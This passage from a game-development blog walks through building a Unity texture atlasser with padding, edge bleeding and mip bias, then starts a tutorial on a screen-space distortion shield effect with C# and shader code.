In most cases, this is great, but in a texture atlas, this can lead to the edges of individual textures getting mixed with neighboring textures when the mips are generated. In extreme cases (like pictured above), the edges of a really bright texture can pick up dark colours and look very different from what’s intended. There are lots of ways to mitigate this in a texture atlasser, but I’ve yet to find a texture atlasser out there that does any of them by default, so today we’re going to build one that does.

How A Texture Atlasser Works

At a high level, a texture atlasser consists of two parts, which I’ve assigned super unofficial names:

A Texture Packer, which determines where to put each texture in the atlas
A Blitter, which uses the UV rectangles generated by the bin packer to draw textures into the output atlas texture.

The Texture Packer is a pretty universal component. We’re going to walk through building one for completeness sake, but the real meat here is what we do in the Blitter to help our mip maps.

How to Build a Texture Packer

Since it’s the first step in the process, let’s tackle the packer first. I’m going to write all the code in Unity because then I can piggy back on all their systems and keep the amount of code in this article manageable, but the core concepts are applicable anywhere. It’s worth noting that there isn’t really anything special about this texture packing implementation, we’ll get to the real meat of what I want to talk about in the Blitter section.

The Output Struct

Speaking of core concepts, let’s talk about what our Texture Packer is going to output.

public struct AtlasLayout
{
    int width;
    int height;
    public List<Texture2D> textures;
    public List<Rect> rects;

    public AtlasLayout(int w, int h)
    {
    	width = w;
    	height = h;
    	textures = new List<Texture2D>();
    	rects = new List<Rect>();
    }
};

The reason we need to output all this data is to handle cases where we want to return list of AtlasLayouts instead of a single one, which we might want to do if we have a lot of textures to atlas, but our hardware limits us to a max of 2048x2048 textures (like some mobile phones). In the interest of brevity, I’m not going to handle multiple atlasses in this article, but I still feel like having a defined output struct makes things cleaner.

So now we have our output set up, let’s start fitting rectangles into other rectangles, shall we? There are lots of algorithms for doing this (many are described in detail here, but the one I like best is the MaxRect algorithm.

The PackTextures Function

The algorithm works by defining a list of “Free Rectangles”, that is, a list of empty rectangles in the target atlas texture. Before the first texture is packed, our list of Free rectangles will contain a single element which has position (0,0), and be the size of the atlas. I’m going to start putting this initial setup into our PackTexture function, which will be the publically exposed function we call when we want to kick off the TexturePacker.

public static AtlasLayout PackTextures(Texture2D[] textures, int maxWidth, int maxHeight)
{
    AtlasLayout results = new AtlasLayout(maxWidth, maxHeight);

    List<Rect> freeRects = new List<Rect>();
    List<Texture2D> textureToPlace = new List<Texture2D>(textures);
    texturesToPlace = texturesToPlace.OrderBy( x => x.width * x.height).ToList();

    freeRects.Add(new Rect(0,0,maxWidth, maxHeight));
    ...

You’ll notice that I’m also sorting our input textures. This is to make sure that we try to place the larger textures first, since they’re the hardest ones to find space for in an atlas. Linq is awful for runtime performance, but for a build-time tool like our atlasser, it makes our lives a lot easier (and my blog post a lot shorter).

Now we need to start placing atlasses into the area defined by our free list. To figure out where to place a texture, we’re going to call our FindIdealRect function. This function is going to return two score values to us, along with the candidate rectangle that it finds.

We’re going to call FindIdealRect on every texture that we have to place, and only actually Insert the rectangle which has the best score. Then we’ll remove that texture from the list and do the whole process again.

This looks like this:

...
while (texturesToPlace.Count > 0)
{
	int bestShortSideScore = int.MaxValue;
	int bestLongSideScore = int.MaxValue;
	Texture2D bestTex = texturesToPlace[0];
	Rect bestRect = new Rect();

	foreach(Texture2D curTex in texturesToPlace)
	{
    	int shortSideScore = int.MaxValue;
    	int longSideScore = int.MaxValue;

    	Rect target = FindIdealRect(curTex.width,
    				curTex.height,
    				freeRects,
    				ref shortSideScore,
    				ref longSideScore);

    	if (shortSideScore < bestShortSideScore
    		|| (shortSideScore == bestShortSideScore && longSideScore < bestLongSideScore))
    	{
    		bestShortSideScore = shortSideScore;
    		bestLongSideScore = longSideScore;
    		bestTex = curTex;
    		bestRect = target;
    	}
	}

	if (bestRect.width > 0 && bestRect.height > 0)
	{
		RemoveRectFromFreeList(bestRect, freeRects);
		results.textures.Add(bestTex);
		results.rects.Add(bestRect);
		texturesToPlace.Remove(bestTex);

	}
	else break; //no room left
}
return results;
}

Notice that the scores I was talking about above are named shortSideScore and longSideScore in this code example. The results object we add textures/rectangles to is the AtlasLayout struct we’re going to return. Then we exit the function by returning that struct. In the example above, if we run out of space in the atlas, the packer simply exits early.

In a production system, you’ll want to do something more intelligent than this, but what you do is dependent on your project. For example, I worked on a game with very strict memory budgets for our environment artists. The atlas for an environment couldn’t exceed 1024x1024, so if we went over, the atlasser would expand the target atlas to a size big enough for the textures to fit, but return an error. This allowed the artists to visualize what was exceeding the atlas bounds, but still prevented overly large atlasses from entering production.

Next, it’s time to add some actual texture packing logic to it. To do that we need to flesh out two functions that you may have noticed above:

private static Rect FindIdealRect(int width, int height, List<Rect> freeRects,
    ref int bestShortSideFit, ref int bestLongSideFit);

private static void RemoveRectFromFreeList(Rect rectToRemove, List<Rect> freeRects);

The Placement Function

The Placement Function is where we’re going to actually find a rectangle in the atlas to assign to a texture. There are lots of ways to pick a rectangle out of the free list, but the heuristic I’m going to use is the “Short Side Fit” heuristic. This means that we are going to try to find a free rectangle which has the least amount of remaining space along 1 dimension. This sounds much more abstract than it looks like in code, don’t worry.

So that we have a bit of context, let’s start this section by taking a look at what this function look like without the finding/scoring logic.

private static Rect FindIdealRect(int width,
				 int height,
				 List<Rect> freeRects,
				 ref int bestShortSideFit,
				 ref int bestLongSideFit)
{
	Rect bestNode = new Rect();

	for (int i = 0; i < freeRects.Count; ++i)
	{
		if (freeRects[i].width >= width && freeRects[i].height >= height)
		{
			// score the rect here

			// if score is the best, replace bestNode with this rect,
			// and set bestShortSideFit and bestLongSideFit to new
			// values
		}
	}

	return bestNode;
}

As you can see, there really isn’t too much to talk about here, it’s just easier to think about the next part when you know how it all fits together.

Let’s look at the scoring code next. Remember all we care about is how much space is left over in the freeRectangle once we place our texture rect into it:

//score the rect here
int remainingX = (int)(freeRects[i].width - width);
int remainingY = (int)(freeRects[i].height - height);

int shortSideFit = Mathf.Min(remainingX, remainingY);
int longSideFit = Mathf.Max(remainingX, remainingY);

// if score is the best...

Once we know our score values, all that’s left is to see if these are the best scores we have, and do something if they are:

// if score is the best, replace bestNode with this rect,
// and set bestShortSideFit and bestLongSideFit to new
// values

if (shortSideFit < bestShortSideFit ||
   (shortSideFit == bestShortSideFit && longSideFit < bestLongSideFit))
{
	bestNode = new Rect(freeRects[i].x,freeRects[i].y, width, height);
	bestShortSideFit = shortSideFit;
	bestLongSideFit = longSideFit;
}

Remember that the bestShortSideFit and bestLongSideFit arguments are going to be read later by the PackTexture function to decide which texture to place next.

That’s all there is to this function! All that’s left now is for us to be able to gracefully remove a rectangle from our free list.

The Remove Function

Once we’ve found our target free rect, we add that placed texture rect to our output list, and remove that texture’s area from the free rectangle that it was placed in. In a lot of cases, this is going to give us a shape that isn’t a rectangle any more.

Image from 1000 Ways to Pack The Bin

However, since we are only storing rectangles in our FreeRect list, we need to split this new shape into rectangles. The MaxRect algorithm name refers to the fact that we actually are going to split these kinds of shapes into up to 4 rectangles instead of two, meaning that we will have some overlap.

What this overlap means in practice is that when we need to remove a rectangular area from our list of free rectangles, we have to check every rectangle in the free list and remove / subdivide all the ones that are affected, not just the one that we found to place our texture into. We also need to remove any rectangles in the free list which are wholly encompassed by another rectangle, which can happen as we add more and more textures to the atlas.

We’re going to put all of this in the RemvoeRectFromFreeList function that we saw earlier:

private static void RemoveRectFromFreeList(Rect rectToRemove, List<Rect> freeRects);

The signature is pretty straightforward, and to be honest, so is the function, but let’s take a look at the outline of it first:

private static void RemoveRectFromFreeList( Rect rectToRemove,
				        List<Rect> freeRects)
{
    for (int i = 0; i < freeRects.Count; ++i)
    {
    	Rect freeRect = freeRects[i];

    	if (freeRect.Overlaps(rectToRemove))
    	{
    	    //subdivide rectangle here
    	    freeRects.RemoveAt(i--);
    	}
    }

    //remove free rects that are wholly contained by others
}

As discussed, there’s only really two interesting parts to this function, the subdivision of affected rectangles, and the removal of ones that are wholly overlapped by larger ones.

Let’s look at the subdivision first, It’s tempting to think that we only need to split along the top and right sides because we will always be subtracting the texture rect from the bottom left corner of the freeRect, and if you’re always working with nicely power of two textures that may be the case, but things can get hairy when you mix in npot textures, so we check on all four sides of the input rectangle, like this:

//subdivide rectangle here
if (rectToRemove.x < freeRect.x + freeRect.width && rectToRemove.x + rectToRemove.width > freeRect.x) {
	// New node at the top side of the used node.
	if (rectToRemove.y > freeRect.y && rectToRemove.y < freeRect.y + freeRect.height) {
		Rect newNode = freeRect;
		newNode.height = rectToRemove.y - newNode.y;
		freeRects.Add(newNode);
	}

	// New node at the bottom side of the used node.
	if (rectToRemove.y + rectToRemove.height < freeRect.y + freeRect.height) {
		Rect newNode = freeRect;
		newNode.y = rectToRemove.y + rectToRemove.height;
		newNode.height = freeRect.y + freeRect.height - (rectToRemove.y + rectToRemove.height);
		freeRects.Add(newNode);
	}
}

if (rectToRemove.y < freeRect.y + freeRect.height && rectToRemove.y + rectToRemove.height > freeRect.y) {
	// New node at the left side of the used node.
	if (rectToRemove.x > freeRect.x && rectToRemove.x < freeRect.x + freeRect.width) {
		Rect newNode = freeRect;
		newNode.width = rectToRemove.x - newNode.x;
		freeRects.Add(newNode);
	}

	// New node at the right side of the used node.
	if (rectToRemove.x + rectToRemove.width < freeRect.x + freeRect.width) {
		Rect newNode = freeRect;
		newNode.x = rectToRemove.x + rectToRemove.width;
		newNode.width = freeRect.x + freeRect.width - (rectToRemove.x + rectToRemove.width);
		freeRects.Add(newNode);
	}
}

freeRects.RemoveAt(i--);

Note: this subdivision code has been shamelessly stolen from the public domain implementation of the MaxRect algorithm on the Unity Wiki)

Finally, all that’s left is to prune our freeList of tiny rectangles:

//remove free rects that are wholly contained by others
for(int i = 0; i < freeRects.Count; ++i)
{
	for(int j = i+1; j < freeRects.Count; ++j)
	{
		if (freeRects[i].IsContainedIn(freeRects[j]))
		{
			freeRects.RemoveAt(i);
			--i;
			break;
		}

		if (freeRects[j].IsContainedIn(freeRects[i]))
		{
			freeRects.RemoveAt(j);
			--j;
		}
	}
}

The only interesting part of this code is the IsContainedIn function, which is just an extension method that I added to the Rect object to make this code more readable. That method is defined as follows:

public static bool IsContainedIn(this Rect a, Rect b)
{
	return a.x >= b.x && a.y >= b.y
		&& a.x+a.width <= b.x+b.width
		&& a.y+a.height <= b.y+b.height;
}

And with that, we’ve covered all the code needed to build a fully featured texture packer! Congratulations! The full source for the finished class is available here: [LINK TO PASTEBIN]

In my implementation, I wrap all of the code thus far in a TexturePacker class. I’m going to assume that you’ve done the same for the rest of this tutorial,.

Despite all our hard work, our journey isn’t over, it’s time to put all this code to work and actually make an atlas.

Building the Blitter

As simple as it sounds, the Blitter is actually more nuanced than the packer, because it’s where you really start to dig into the features that you want our Texture Atlasser to have. At it’s most basic, all it needs to do is to copy pixels from one texture to another, so let’s start by getting the simplest impementation possible set up:

public static Texture2D MakeAtlas(ref Texture2D[] textures, out Rect[] packedRects)
{
	AtlasLayout packResults = TextureAtlasser.PackTextures(textures, 2048,2048);
	Texture2D outAtlas = new Texture2D(packResults.width, packResults.height);

	textures = packResults.textures;
	packedRects = packResults.rects;

	for (int i = 0; i < packResults.textures.Count; i++)
	{
		Rect rect = packResults.rects[i];
		Texture2D readableTex = null;

		//load the image uncompressed
		string fileURL = AssetDatabase.GetAssetPath(packResults.textures[i]);
		byte[] imgByes = File.ReadAllBytes(fileURL);
		readableTex = new Texture2D(1,1,TextureFormat.ARGB32,false);
		readableTex.LoadImage(imgByes);

		Color[] pixels = readableTex.GetPixels();
		outAtlas.SetPixels((int)rect.x, (int)rect.y,(int)rect.width,(int)rect.height,pixels);
		outAtlas.wrapMode = TextureWrapMode.Clamp;
		outAtlas.Apply();

	}

	return outAtlas;
}

Make sure you set your wrap mode to clamp, otherwise you’re going to get texture seams when using textures on the edges of the atlas, that might look like this:

You’ll know this is from your wrap mode instead of your mips because the seams won’t go away when you zoom in.

Also notice that in the above, I’m hardcoding the size of our atlas to be 2048x2048. This is just for brevity, in your system, you’ll likely want to revisit this and do something smarter.

There’s a really really big mistake that you can make in your blitter, and that’s using textures that have already been compressed by Unity. Unless you’re importing all your textures as uncompressed, Unity has likely already applied some amount of compression to the textures in your project. If we use the Unity imported textures in our atlas, when the atlas is compressed, we’re going to compress the images inside it twice, which is going to make them look far worse than they have to.

To get around that, you can load the image directly from disk as a byte array and use that instead (like I’m doing above). It’s a few extra lines of code that makes a big difference on your final product. Note that this will only work if your images are jpgs or pngs. If they’re tifs, or psds or something else weird, you’ll have to find a different solution.

What we have here is where most texture atlassing systems seem to stop, and this is a perfectly sensible place to stop if you aren’t going to be mipping your atlasses, but there are two things we can do to make this more friendly, which I’ll talk about next.

Padding Support

One thing we can do is to add support for padding to our blit function. Padding simply means adding space between the different textures that we pack in our atlas:

One key thing to note with padding in an atlas, is that we want the padding to be inner padding. For example, if we have a 512x512 texture in the atlas,and we want to add 5 pixels of padding, we are going to add the padding to the perimeter of that texture’s rectangle and render the texture into a 502x502 rectangle in the center. You can do it the other way around, but it’s easier for artists to reason about how much texture space they’re using if we can still say things like “you can fit 4 512x512 textures into a 1024x1024 atlas.”

This means that we’re going to have to resize our input textures on the fly. Luckily Unity has a super handy function already available to us, which takes a UV coordinate and returns the properly bilinearly sampled texel color, nifty right?

So what we’re going to do is modify our function signature to take an integer argument for padding:

public static Texture2D MakeAtlas(ref Texture2D[] textures, out Rect[] packedRects, int padding)

and then modify the code that’s inside the for loop we saw above:

for (int i = 0; i < packResults.textures.Count; i++)
{
	Rect rect = packResults.rects[i];
	Texture2D readableTex = null;

	//load the image uncompressed
	string fileURL = AssetDatabase.GetAssetPath(packResults.textures[i]);
	byte[] imgByes = File.ReadAllBytes(fileURL);
	readableTex = new Texture2D(1,1,TextureFormat.ARGB32,false);
	readableTex.LoadImage(imgByes);

	int localPadding = Mathf.Min(padding, readableTex.width /4);
	rect.x += localPadding;
	rect.width -= localPadding*2;
	rect.y += localPadding;
	rect.height -= localPadding*2;

	for (int x = 0; x < rect.width; x++)
	{
		for (int y = 0; y < rect.height; y++)
		{
			Color pixel = readableTex.GetPixelBilinear(x / rect.width, y / rect.height);
			outAtlas.SetPixel((int)rect.x + x, (int)rect.y +y, pixel);
		}
	}

	outAtlas.wrapMode = TextureWrapMode.Clamp;
	outAtlas.Apply();
}

Ok, now we’re talking!

Notice that we have a check in there to make sure that we never add so much padding that a texture is completely invisible on the atlas, or so much padding that the padded areas overlap.

Edge Bleeding

So this is great, and is going to make sure that (at least on the higher resolution mips), our textures aren’t going to bleed into each other. Unfortunately it means (at least right now), that they’ll instead pick up whatever value we clear our texture to. What we want to do next is to make sure that the areas that contain our padding are filled with the edge colour of the textures inside them. This is going to give us an atlas that looks something like this:

To do this, the easiest way is to simply set the wrapMode of our readableTex to clamp and sample UVs outside of 0 to 1 for the padding regions. In code, this looks like this:

for (int i = 0; i < packResults.textures.Count; i++)
{
    //Some Code Omitted For Brevity

    readableTex.wrapMode = TextureWrapMode.Clamp;
    readableTex.LoadImage(imgByes);

    int localPadding = Mathf.Min(padding, readableTex.width /4);

    Rect innerRect = packResults.rects[i];
    innerRect.x += localPadding;
    innerRect.y += localPadding;
    innerRect.width -= localPadding*2;
    innerRect.height -= localPadding*2;

    for (int x = (int)rect.x; x < (int)rect.x + (int)rect.width; x++)
    {
        for (int y = (int)rect.y; y < (int)rect.y + (int)rect.height; y++)
        {
        	int xSample = x - (int)innerRect.x;
        	int ySample = y - (int)innerRect.y;

        	Color pixel = readableTex.GetPixelBilinear(xSample / innerRect.width, ySample / innerRect.height);
        	outAtlas.SetPixel(x,y, pixel);
        }
    }

    packedRects[i] = innerRect;

    outAtlas.wrapMode = TextureWrapMode.Clamp;
    outAtlas.Apply();
}

Notice that we have to replace the rectangle in our packedRect array with the padded one, otherwise when we use that UV rect, it will include the padding area around the texture, which is less than ideal.

Perfect! Now what about those areas that have no texture in them at all… they’re still going to be a problem when we start using lower resolution mips, so we need to fill them in too. What’s worked for me in the past is visit every pixel, and if it isn’t contained in a UV rect, look along the horizontal and vertical axis until you find the closest pixel that is, and shade using that color.

Your atlas will end up looking something like what I have below. For the purposes of this example, I shrank the rock texture in the above atlas to make some more space.

The code changes to make this work are a bit more involved than before, so I’m going to go through each part instead of throwing all the code at you at once.

First, since we’re going to need to look up colours our packed textures after they’ve been placed, we’re going to need to store the readable textures we create in an array that we can access later:

Texture2D[] readables = new Texture2D[textures.Length];

Then in the body of the packing loop, we need to assign the readable textures we create to this array:

readables[i] = readableTex;

So far so easy right? Now, after we get out of the packing loop, we need to add a second set of loops, which is going to iterate over all the pixels in our output atlas, and check if they are contained in any of our (unpadded) UV rects. If they aren’t, we’ll grab the texture in the one that’s closest and call GetPixelBilinear again:

for (int x = 0; x < outAtlas.width; ++x)
{
    for (int y = 0; y < outAtlas.height; ++y)
    {
    	float closestDist = float.MaxValue;
    	Color c = Color.clear;

    	for (int r = 0; r < packedRects.Length; ++r)
    	{
            Rect curRect = packedRects[r];
            if (curRect.Contains(new Vector2(x,y)))
            {
            	closestDist = -1;
            	break;
            }

            int d = DistanceToRect(curRect, x,y);

            if (d < closestDist)
            {
            	closestDist = d;
            	float uvX = (x - curRect.x) / curRect.width;
            	float uvY = (y - curRect.y) / curRect.height;
            	c = readables[r].GetPixelBilinear(uvX, uvY);
            }
    	}

    	if (closestDist > -1)
    	{
    	    outAtlas.SetPixel(x,y,c);
    	}
    }
}

outAtlas.wrapMode = TextureWrapMode.Clamp;
outAtlas.Apply();

Not the fastest code in the world, but it churns throuh filling in the space on an almost empty 2048x2048 texture in a few seconds on my laptop so I’m calling it good enough for a build time tool. It’s important to make sure that you only call outAtlas.Apply() at the end of your function, as that’s the call that persists data to disk and is very slow, if you call it inside a loop you’ll be waiting for awhile.

The last bit of code we need is the body of the DistanceToRect function, which returns the distance from a given point to the edge of a rectangle:

private static float DistanceToRect(Rect r, int x, int y)
{
    float xDist = float.MaxValue;
    float yDist = float.MaxValue;

    xDist = Mathf.Max(Mathf.Abs(x - r.center.x) - r.width / 2, 0);
    yDist = Mathf.Max(Mathf.Abs(y - r.center.y) - r.height / 2, 0);
    return xDist * xDist + yDist * yDist;
}

Wrapping Things Up

What we have now is a perfectly good Texture Atlasser! With padding and edge bleed, the mips you care most about (the higher resolution ones) are likely going to be completely unblemished. If anything here wasn’t clear, or you just want some source, it’s available at the end of this post.

However, there’s one more thing you can do to make this really shine. If you’re following along, you may have realized that even with all of this set up (and padding cranked), there isn’t really much you can do about the smallest mip level. There’s just too little resolution to reasonably store information about different textures, and no matter how much padding you add, you still end up with some mipping artifacts:

I had to zoom in on my image to highlight the artifacts, forgive the low resolution

To get around this, you can set the mip bias of the texture to a negative number, so that it always will pull from a higher mip map. This will make your texture sharper, and prevent it from hitting the lowest mip level (assuming you bias it to -1). This obviously has minor performance implications, but assuming you have the wiggle room to weather them, it’s going to get you a much nicer looking scene.

The code to do this is a little odd because Unity doesn’t really let you control anything about your mip maps unless you do it when the texture is imported, this is a bit odd, given that you can write other metadata (like we did with our wrapMode earlier) before you save the asset to disk, but regardless, we’re going to need to write a custom texture importer to set our mip bias.

Custom asset importers are pretty easy to build with unity. Here’s one that gets us the mip bias value we want on our input atlasses:

public class AtlasImporter : AssetPostprocessor  
{
    private void OnPostprocessTexture(Texture2D import)
    {
    	if (assetPath.Contains("Atlasses"))
    	{
    	   import.mipMapBias = -1.0f;
    	}
    }
}

Make sure to put this on a script located in your Editor folder in our Project Hierarchy, or the code won’t get run. Assuming you’ve done all that correctly, when you regenerate (or reimport) your atlas, those far away seams should be completely cleared up:

You’ll notice that what texture data is present in the image changes when I change the mip bias, this is expected because we are literally sampling from a different, higher resolution mip map in the second photo, so things aren’t going to look 100% identical to when we didn’t have the bias set.

With that done, we have our atlasser! It’s worth noting that this won’t solve all your problems if the input textures to your atlasser arent power-of-two sized. If that isn’t the case for you, you’ll want to generate your own mips in addition to everything we’ve talked about here. I recommend not letting an NPOT texture get in an atlas meant for 3D content, but if you for some reason must do that, more info is available from NVidia

Whew, this covered a lot of ground! In case you weren’t following along at home, all the code that I’ve talked about here has been uploaded to github

If you have any questions about this, or spot a mistake, shoot me an email, or a twitter message. I check twitter…sorta…not frequently, but I will eventually see it if you send me something there. My email / twitter is available in the sidebar. Have a good one!

Screen Space Distortion and a Sci-fi Shield Effect

2016-01-15T00:00:00+00:00

Sometimes inspiration comes from the weirdest places. I was idly browsing reddit after work awhile ago and stumbled onto this post by user Guillaume_Langis. It was a gif of a shield effect that they had created for their game Warfleet. The comments section on that site was filled (predictably) with users asking how they effect was done, and Guillame ended up actually posting the c# and shader source online for people to play with, which is awesome (thanks!)

The effect already looks great, but when I think of a sci-fi shield I think of distortion, and wobbling “force field” style effects, which is what I’m going to add to the shield effect, talk about in this article and use to turn the shield effect into this:

Some Initial Housekeeping

The space ship in these screen shots is available free on the asset store, and the texture I threw on the shield was just one I got by googling for “plasma texture.” I also took the liberty of optimizing the original effect which was posted to reddit. You can find the original code here.

All the scripts and shaders used in this post will be available at the end of the article, but to start with, I’ve uploaded a unity project with a scene set up with this effect ready to go so that it’s easy to follow along here. This article is about how to build a distortion effect, not about how to create to shield effect so it won’t be explained, but it will be a lot easier to follow this post if you have a project set up with it. I haven’t included the space ship or space textures from the screenshots because I didn’t make those, but you should be able to get them yourself pretty easily. As we go through this post, my screenshots will alternate between what the sample scene should look like and what it looks like with real assets.

Ok, now that that’s out of the way, time to get cracking.

The Basics of Screen Space Distortion

Let’s start by talking about what exactly a Screen Space Distortion effect is. You’ve definitely seen the effect before, it’s used to render everything from refraction to heat haze to trippy drug sequences in games, and it’s actually really simple.

At it’s core, all the effect requires is that you render your main camera (the one which will show the distortion) to a texture instead of rendering it directly to the framebuffer, then blit it (draw it) to the frame buffer from that texture using a shader which offsets the uvs used to sample your main camera texture.

A really simple example might look something like this:

Of course, there isn’t a one size fits all way to modify the UV coordinates, which is where the fun starts. But before we get there, lets walk through the code required to make the trivial example above actually functional.

First, we need to get our main camera rendering to a secondary texture. Usually when you want a camera to render to a texture in Unity you use the targetTexture attribute of the camera component, but not today. Unity is a bit quirky here, but I’ve found in practice that you can’t blit a texture to the frame buffer if that texture is currently a camera’s target texture. Since we’re going to be blitting this texture to the framebuffer as we apply our post effect, we need to use a different bit of api:

public class ScreenSpaceDistortionEffect : MonoBehaviour
{
    RenderTexture screenRT;
    Camera mainCam;

    void Awake()
    {
    	screenRT = new RenderTexture(Screen.width, Screen.height, 16, RenderTextureFormat.Default);
    	mainCam = GetComponent<Camera>();
    	mainCam.SetTargetBuffers(screenRT.colorBuffer, screenRT.depthBuffer);
    }

    void OnPostRender()
    {
    	Graphics.Blit(screenRT, (RenderTexture)null);
    }
}

The SetTargetBuffers call is how we are going to work around the targetTexture weirdness, if you attach this component to your main camera object, you should see that nothing is different in your game view than before we wrote this script, but behind the scenes, we have ourselves a nice easy to work with RenderTexture for our game. Which is perfect!

Now all we need to do is distort that texture. If you look at the docs for Graphics.Blit, you’ll find that you can specify a material. If you think of Graphics.Blit like a full screen quad, then the material you specify here is just the material on that Quad. Blit automatically sets the _MainTex property of this material to your source render texture. Since all we need to do is modify the texture coordinates that we map to the screen, we can get by with a pretty simple material. The example above uses the following:

vOUT vert(vIN v)
{
    vOUT o;
    o.pos = mul(UNITY_MATRIX_MVP, v.vertex);
    o.uv = v.texcoord;
    return o;
}

fixed4 frag(vOUT i) : COLOR
{
    return tex2D(_MainTex, fixed2( i.uv.x + sin(i.uv.y * 100)*0.01, i.uv.y) );
}

I’m going to call this shader our “composite” shader, since it’s what we’re going to use to combine data about how to render the distortion effect with our regular camera view.

Now you just need to modify the earlier c# code to use this new shader, and you should see exactly the same type of effect across your screen.

RenderTexture screenRT;
Camera mainCam;
Material effectMaterial;
void Awake()
{
    screenRT = new RenderTexture(Screen.width, Screen.height, 16, RenderTextureFormat.Default);
    mainCam = GetComponent<Camera>();
    mainCam.SetTargetBuffers(screenRT.colorBuffer, screenRT.depthBuffer);

    effectMaterial = new Material(Shader.Find("Custom/Composite"));
}

void OnPostRender()
{
    Graphics.Blit(screenRT, (RenderTexture)null, effectMaterial);
}

Voila! We now officially have our post effect working!

An Actually Useful Implementation

Now that we have the basics down, it’s time for us to decide how we should go about modifying our screen uvs. Unless you’re going for some sort of drug trip / dream sequence effect, performing arithmetic on the uvs alone is likely not going to cut it. Today we’re going to create a secondary screen buffer (the “shield” buffer), and draw our shield(s) into it using a replacement shader. We’ll then use the contents of that buffer to deform our screen uvs.

But before we get to the replacement shader, let’s just render our shield as is into the secondary buffer (to make sure the buffer is working at all).

We’re going to be modifying our C# script again. We need to create the second render texture for the shield, but we don’t need this one to be at full screen res, since we aren’t going to be actually using it for colours in the framebuffer, and it’s much lighter on your gpu to only draw into the smaller buffer. Then we need to set up our camera, and get it rendering into this buffer. Here’s what that looks like:

RenderTexture shieldRT;
RenderTexture screenRT;
Camera distortCam;
Camera mainCam;
Material effectMaterial;

void Awake()
{
    screenRT = new RenderTexture(Screen.width, Screen.height, 0, RenderTextureFormat.Default);
    screenRT.wrapMode = TextureWrapMode.Repeat;

    shieldRT = new RenderTexture(Screen.width/4,Screen.height/4,0, RenderTextureFormat.Default);
    shieldRT.wrapMode = TextureWrapMode.Repeat;

    effectMaterial = new Material(Shader.Find("Custom/Composite"));

    mainCam = GetComponent<Camera>();
    mainCam.SetTargetBuffers(screenRT.colorBuffer, screenRT.depthBuffer);

    distortCam = new GameObject("DistortionCam").AddComponent<Camera>();
    distortCam.enabled = false;
}

void OnPostRender()
{
    distortCam.CopyFrom(mainCam);
    distortCam.backgroundColor = Color.grey;
    distortCam.cullingMask = 1 << LayerMask.NameToLayer("Shield");
    distortCam.targetTexture = shieldRT;
    distortCam.Render ();

    effectMaterial.SetTexture("_DistortionTex", shieldRT);
    Graphics.Blit(screenRT, null, effectMaterial);
}

If you run this now (and make the shieldRT public), you’ll be able to see that we are successfully drawing into our shield buffer, but our effect shader isn’t doing anything useful with that data yet, so let’s look at that next. For this initial step, let’s modify the composite shader to simply subtract the G and B values of the distortion texture from the screen uvs:

sampler2D _DistortionTex;
fixed4 frag(vOUT i) : COLOR
{
    fixed4 distort = tex2D(_DistortionTex, i.uv);
    fixed4 tex = tex2D(_MainTex, fixed2(i.uv.xy - (distort.gb - 0.5)));
    return tex;
}

If you hit run now, this is what the sample scene should look like:

Not exactly what we’re after - but at least it’s interesting!

Now that we’ve proven that the secondary buffer is working, it’s time to think about how we want our shield to look. When I think of a force field, I think of it as energy repelling things away from whatever is inside the shield. So I think I’d like my shield to communicate that visually. Let’s shift the UVs on the edge of the shield away from the center of the circle.

To do this, we’re going to use a replacement shader, which is going to swap the shader on our shield bubbles when they’re rendered by our distortion camera. This will let us write the data we need to our secondary buffer without changing how the bubble looks in game.

Let’s use the following as a starting point:

CGPROGRAM
#pragma vertex vert
#pragma fragment frag
#include "ShieldEffect.cginc"

struct vIN
{
    float4 vertex : POSITION;
    float2 texcoord : TEXCOORD0;
    float3 normal : NORMAL;
};

struct vOUT
{
    float4 pos : SV_POSITION;
    float3 oPos : TEXCOORD0;
    float3 wPos : TEXCOORD1;
    float3 wNorm : TEXCOORD2;
    float3 objPos : TEXCOORD3;
};

sampler2D _MainTex;

vOUT vert(vIN v)
{
    vOUT o;
    o.pos = mul(UNITY_MATRIX_MVP, v.vertex);
    float3 zeroPos = mul(UNITY_MATRIX_MVP, float4(0.0,0.0,0.0,1.0));
    o.wPos = mul(_Object2World, v.vertex);				
    o.wNorm = normalize(mul(fixed4(v.normal, 0.0), _World2Object).xyz);
    o.objPos = v.vertex.xyz;
    o.oPos = normalize(o.pos.xyz - zeroPos.xyz);

    return o;
}

fixed4 frag(vOUT i) : COLOR
{
    fixed4 tex = fixed4(i.oPos.x,0.0,i.oPos.y, 1.0);
    float intensity = CalcShieldIntensity16(i.objPos);

    float3 viewdir = normalize(_WorldSpaceCameraPos - i.wPos);
    float ang = 1.0- dot(viewdir, i.wNorm) + intensity;

    return (tex *  ang) + 0.5;
}
ENDCG

Before we go about plumbing this in to our game, let’s talk about what’s going on here. First, since we want our effect to look the same no matter what angle we’re viewing from, it simplifies a lot of things if we work in screenspace for generating the actual colours that we’re writing to the buffer. What we want is for the colours we write to be representative of their direction from the center of the shield, so to do that, we transform the origin point of the object (the zeroPos variable) into screen space as well, and then subtract that point from our vertex’s position in screen space. This gives us a nice direction vector to work with.

In the fragment shader, we turn this direction vector into a colour, and we use a rim light calculation to attenuate the colours towards the center of the shield (since the normals for the center of the screen space sphere will always point towards the camera). Then we add 0.5 to everything, so that we can use this buffer to distort things in both directions in U,V space (since you can’t write a negative colour into a buffer). This means that any pixel in the buffer which is written out as 128,128,128 will do nothing, but values above and below are valid.

Finally, we add the intensity calculation to our fragment so that our impacts can distort more along their edges. This obviously won’t be 100% accurate because the direction of the distortion isn’t really being taken into account, but it creates a good looking effect anyway. You could spend more time making sure that the impact bubbles distort in a consistent way out from their center, but for brevity’s sake I’m not going to in this post.

This is going to give us a shield buffer that looks something like this (assuming 2 shields on screen):

Now all we need to do is get the replacement shader working. Just get the shader into your script the same way we loaded in the Composite shader, and make this really simple 1 line change to the Render call in OnPostRender:

distortCam.RenderWithShader(shieldReplacementShader, null);

And with that, we should have the following!

Note that you may find that the effect is too intense even with the replacement shader (this is extremely noticeable if you’re working with the scene I gave you at the beginning of the article). In that case you may want to tone down the intensity of the effect by adding a multiplication into the compostie shader:

fixed4 tex = tex2D(_MainTex, fixed2(i.uv.xy + (distort.gb - 0.5) * 0.1 ));

if you’re following along at home, the your sample scene should look like this if you grab your shield and move it around:

You may also notice that the edges of your shield bubble are now a little bit jagged. This is because we’re rendering to a smaller buffer for the shield effect. This can be alleviated by increasing the size of the shield renderTexture (which is EXTREMELY expensive), or doing some sort of blur operation on your shield buffer (probably less expensive). However we’re not going to worry about it today because by the end of the article we’re going to have an approach that hides this jagginess.

